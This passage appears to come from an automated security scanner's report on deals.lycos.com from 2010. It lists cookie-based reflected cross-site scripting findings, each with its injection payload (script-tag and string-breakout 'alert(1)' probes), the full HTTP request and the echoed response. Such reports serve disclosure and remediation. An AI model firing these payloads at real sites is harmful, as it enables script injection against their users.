Content-Type: text/html; charset=utf-8
Content-Length: 17185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a&amp;cj=1" alt="tracker" />
...[SNIP]...

3.192. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kempler-and-strauss-watch-cell-phone-175-413939

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7814e"%3balert(1)//72d8244a306 was submitted in the diktfc cookie. This input was echoed as 7814e";alert(1)//72d8244a306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e"%3balert(1)//72d8244a306; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e";alert(1)//72d8244a306"
});
</script>
...[SNIP]...

3.193. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e2d"><script>alert(1)</script>71fb8bc76fa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa&amp;cj=1" alt="tracker" />
...[SNIP]...

3.194. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39673"%3balert(1)//133a711edd1 was submitted in the diktfc cookie. This input was echoed as 39673";alert(1)//133a711edd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673"%3balert(1)//133a711edd1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673";alert(1)//133a711edd1"
});
</script>
...[SNIP]...

3.195. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63277"><script>alert(1)</script>b757cca267c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c&amp;cj=1" alt="tracker" />
...[SNIP]...

3.196. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01b2"%3balert(1)//174a20976d8 was submitted in the diktfc cookie. This input was echoed as a01b2";alert(1)//174a20976d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2"%3balert(1)//174a20976d8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2";alert(1)//174a20976d8"
});
</script>
...[SNIP]...

3.197. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee78"><script>alert(1)</script>a4a1fb5c58d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d&amp;cj=1" alt="tracker" />
...[SNIP]...

3.198. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c66"%3balert(1)//b6a939bc91 was submitted in the diktfc cookie. This input was echoed as 45c66";alert(1)//b6a939bc91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66"%3balert(1)//b6a939bc91; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66";alert(1)//b6a939bc91"
});
</script>
...[SNIP]...

3.199. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ae2"><script>alert(1)</script>ecb316bab89 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89&amp;cj=1" alt="tracker" />
...[SNIP]...

3.200. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55068"%3balert(1)//77d4c7afd2 was submitted in the diktfc cookie. This input was echoed as 55068";alert(1)//77d4c7afd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068"%3balert(1)//77d4c7afd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068";alert(1)//77d4c7afd2"
});
</script>
...[SNIP]...

3.201. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb5"%3balert(1)//cc77090642d was submitted in the diktfc cookie. This input was echoed as a4fb5";alert(1)//cc77090642d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5"%3balert(1)//cc77090642d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5";alert(1)//cc77090642d"
});
</script>
...[SNIP]...

3.202. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18fe"><script>alert(1)</script>50f5a41c6f0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
